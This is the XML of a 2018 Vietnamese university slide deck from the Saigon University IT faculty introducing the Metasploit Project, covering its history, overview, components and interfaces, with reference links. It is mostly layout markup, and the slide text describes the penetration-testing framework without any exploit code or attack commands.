                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId15"/>
              </a:rPr>
              <a:t>https://tinyurl.com/y9wxvups</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400">
              <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod" startAt="8"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" u="sng">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId16"/>
              </a:rPr>
              <a:t>https://tinyurl.com/y8rmdzfk</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317AADAE-BEA8-4761-9289-77A15DF9BE95}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2570683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342" y="595086"/>
            <a:ext cx="7678057" cy="5758543"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Number Placeholder 6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{317AADAE-BEA8-4761-9289-77A15DF9BE95}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>33</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="407353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838200" y="482600"/>
            <a:ext cx="10515600" cy="1181100"/>
          </a:xfrm>
          <a:prstGeom prst="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 Metasploit Project</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Káº¿t quáº£ hÃ¬nh áº£nh cho Metasploit projec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4600" y="2418556"/>
            <a:ext cx="5029200" cy="3114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38200" y="2875756"/>
            <a:ext cx="5054600" cy="1892826"/>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Lịch sử phát triển</a:t>
            </a:r>
          </a:p>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Tổng quan Metasploit Project</a:t>
            </a:r>
          </a:p>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Các thành phần</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="260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4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="126615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838200" y="482600"/>
            <a:ext cx="10515600" cy="1181100"/>
          </a:xfrm>
          <a:prstGeom prst="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 Metasploit Project</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838200" y="2078604"/>
            <a:ext cx="7025288" cy="3693319"/>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Lịch sử phát triển</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2003 – HD Moore - Perl</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2007 – Ruby</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21/12/2009 – Mua lại bởi Rapid 7</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Metasploit Pro – Metasploit Express – Metasploit Communicate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0" y="1808163"/>
            <a:ext cx="3517900" cy="19685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6594" y="4211638"/>
            <a:ext cx="1674212" cy="1920240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Down Arrow 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9029700" y="3462338"/>
            <a:ext cx="508000" cy="7493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317AADAE-BEA8-4761-9289-77A15DF9BE95}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1708738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838200" y="482600"/>
            <a:ext cx="10515600" cy="1181100"/>
          </a:xfrm>
          <a:prstGeom prst="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 Metasploit Project</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838200" y="2078604"/>
            <a:ext cx="7025288" cy="3093154"/>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Tổng quan</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Mã nguồn mở cho dự án ninh mạng</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Cung cấp thông tin lỗ hổng bảo mật</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Hỗ trợ thử nghiệm thâm nhập</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Phát triển chữ ký IDS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488" y="2891756"/>
            <a:ext cx="3124200" cy="1466850"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{317AADAE-BEA8-4761-9289-77A15DF9BE95}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2585065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838200" y="482600"/>
            <a:ext cx="10515600" cy="1181100"/>
          </a:xfrm>
          <a:prstGeom prst="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 Metasploit Project</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838200" y="2078604"/>
            <a:ext cx="7025288" cy="3093154"/>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Các thành phần</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Interface: console, web, command line, graphical user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="q"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Enviroment: Global (setg,unsetg), Temporary(set,unset)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="AutoShape 2" descr="Káº¿t quáº£ hÃ¬nh áº£nh cho interfac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637" y="2078604"/>
            <a:ext cx="2143125" cy="21431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4882" y="4221729"/>
            <a:ext cx="3738880" cy="210312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1654236"/>
            <a:ext cx="10515600" cy="4670613"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{317AADAE-BEA8-4761-9289-77A15DF9BE95}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="226872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5247" y="2040009"/>
            <a:ext cx="6388553" cy="3092379"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>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406387"/>
            <a:ext cx="5054600" cy="2492990"/>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Khái niệm</a:t>
            </a:r>
          </a:p>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Chức năng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="v"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hành phần</a:t>
            </a:r>
          </a:p>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Phương pháp tấn công</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{317AADAE-BEA8-4761-9289-77A15DF9BE95}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3047852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838200" y="482600"/>
            <a:ext cx="10515600" cy="11811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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>II. Metasploit Framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="44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838200" y="2152387"/>
            <a:ext cx="10515600" cy="3277820"/>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600" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Khái niệm:</a:t>
            </a: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i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Là </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>một framework mã nguồn mở cung cấp môi trường để thử nghiệm xâm nhập (penetration testing: pen-testing) các hệ thống phần mềm, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>mạng và </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>kiểm tra, tấn </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" smtClean="0">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>công, khai </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1">
                <a:latin typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Tahoma" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>thác lỗi của các service. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2600" i="1" smtClean="0">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317AADAE-BEA8-4761-9289-77A15DF9BE95}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4172318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1510</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>235</Paragraphs>
  <Slides>33</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Tahoma</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Trường Đại học Sài Gòn KHOA CÔNG NGHỆ THÔNG TIN</vt:lpstr>
      <vt:lpstr>Mục tiêu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Deftnt</dc:creator>
  <cp:lastModifiedBy>Deftnt</cp:lastModifiedBy>
  <cp:revision>30</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-12-06T17:10:21Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-09T13:10:14Z</dcterms:modified>
</cp:coreProperties>
</file>